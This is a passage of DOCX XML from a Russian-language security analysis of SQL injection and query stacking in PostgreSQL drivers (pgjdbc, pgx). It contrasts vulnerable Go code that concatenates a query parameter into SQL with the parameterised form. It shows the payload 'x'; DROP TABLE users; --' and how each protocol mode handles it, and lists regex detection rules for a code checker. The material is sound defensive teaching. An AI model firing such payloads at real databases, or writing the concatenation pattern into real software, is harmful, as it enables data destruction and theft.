      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement.execute*\(.*\+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createStatement\(\).*execute*\(.*\+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Всегда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setXxx()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Конкатенация имени таблицы/колонки в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prepareStatement(sql)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — отдельная угроза (см. 3.16); pgjdbc не имеет API для безопасной композиции identifiers, нужна валидация по whitelist.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 устанавливать `preferQueryMode=simple`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без явной причины. Этот режим существует для совместимости с PgBouncer в transaction-pooling mode и для отладки; в production-коде с пользовательским вводом он снимает один слой защиты.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Установить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на уровне роли (GUC) — ограничивает урон от удачного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 через стакинг (статически — DDL отработает мгновенно, помогает только для медленных payload-ов).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коде судьи дополнительно: проверка JDBC URL в конфигах на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode=simple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как warning, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">createStatement\(\)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с последующей конкатенацией в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">executeQuery</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как critical.</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pgjdbc ≥ 9.4 (2014) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">preferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> появился, default </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">extended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. До 9.4 драйвер всегда использовал extended для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pgjdbc 42.x — стабильная LTS-ветка, поведение по теме не менялось.</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существует со старта JDBC (1997).</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pgjdbc API: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PreferQueryMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — https://jdbc.postgresql.org/documentation/publicapi/org/postgresql/jdbc/PreferQueryMode.html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pgjdbc docs: «Connecting to the Database» (URL parameters) — https://jdbc.postgresql.org/documentation/use/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JDBC API: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Statement</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 https://docs.oracle.com/javase/tutorial/jdbc/basics/prepared.html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R20 (sources/research.md, строки 328–330)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.5 pgx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Setup.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pgx (актуальная major-версия v5, импорт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">github.com/jackc/pgx/v5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — нативный Go-драйвер для PostgreSQL, не на базе libpq. Реализует wire-protocol напрямую. Поведение определяется параметром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">QueryExecMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (per-connection или per-query), пять режимов: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QueryExecModeCacheStatement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — extended protocol с server-side prepared statement caching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QueryExecModeCacheDescribe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QueryExecModeDescribeExec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QueryExecModeExec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — три вариации extended-protocol (с/без кэша, описание типов)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QueryExecModeSimpleProtocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">simple query protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с client-side substitution параметров</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В четырёх extended-режимах стакинг блокирован сервером. В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SimpleProtocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pgx делает client-side экранирование значений (как pgjdbc-simple, как psycopg2) — значения через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защищены экранированием, но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SQL-текста проходит. Переключение режима — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgx.ConnConfig.DefaultQueryExecMode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или через connection string параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">default_query_exec_mode=simple_protocol</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name := r.URL.Query().Get("name")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rows, err := conn.Query(ctx,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id, email FROM users WHERE name = '"+name+"'")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Конкатенация в SQL-строку. Аргументов через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">...args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> после SQL нет — pgx отправляет строку как есть.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Безопасный код.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">name := r.URL.Query().Get("name")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rows, err := conn.Query(ctx,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "SELECT id, email FROM users WHERE name = $1", name)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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нативный placeholder PostgreSQL. Значение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идёт отдельным arg через wire (extended) или экранированно склеивается (simple).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload</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100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x'; DROP TABLE users; --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Путь 1: default mode (`CacheStatement`, extended) — Parse error на `;` в SQL-тексте.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Даже уязвимый код выше с конкатенацией уходит как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse(query)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + пустой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сервер отвечает:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: cannot insert multiple commands into a prepared statement (SQLSTATE 42601)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Go-приложение получит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*pgconn.PgError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с этим SQLSTATE. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Стакинг здесь не проходит даже при сырой конкатенации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это сильная сторона pgx-default-mode и единственный драйвер из шести, где extended «по дефолту» полностью применяется даже без args.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Уточнение: если разработчик правильно использовал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arg — то же самое плюс защита Bind-аргументом:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Parse:   SELECT id, email FROM users WHERE name = $1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Bind:    $1 = 'x''; DROP TABLE users; --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execute: 0 rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Путь 2: `QueryExecModeSimpleProtocol` — стакинг через конкатенацию проходит.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection config:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">config, _ := pgx.ParseConfig("postgres://user:pass@host/db")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
